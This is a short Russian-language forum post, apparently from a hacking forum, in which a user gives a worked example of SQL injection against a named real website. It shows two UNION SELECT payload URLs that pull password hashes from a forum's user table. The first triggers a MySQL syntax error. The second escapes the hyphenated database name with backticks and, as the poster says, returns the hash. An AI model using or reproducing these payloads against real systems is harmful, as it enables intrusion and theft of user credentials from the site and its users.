|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
Ну вот вам пример )
http://www.ankil.ru/ibs/ibs_program_tpl.php?program_id=-1'+union+select+1,user_pass,3,4,5,6,7,8,9,10,11,12 ,13+from+ita-forum.itaf_user/*
при таком запросе будет ошибка
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-forum.itaf_user/*' AND p.program_active='on' AND p.program_teacher_id=t' at line 3
А если так
http://www.ankil.ru/ibs/ibs_program_tpl.php?program_id=-1'+union+select+1,user_pass,3,4,5,6,7,8,9,10,11,12 ,13+from+%60ita-forum%60.itaf_user/*
мы увидим хеш
Так что Scipio абсолютно прав
|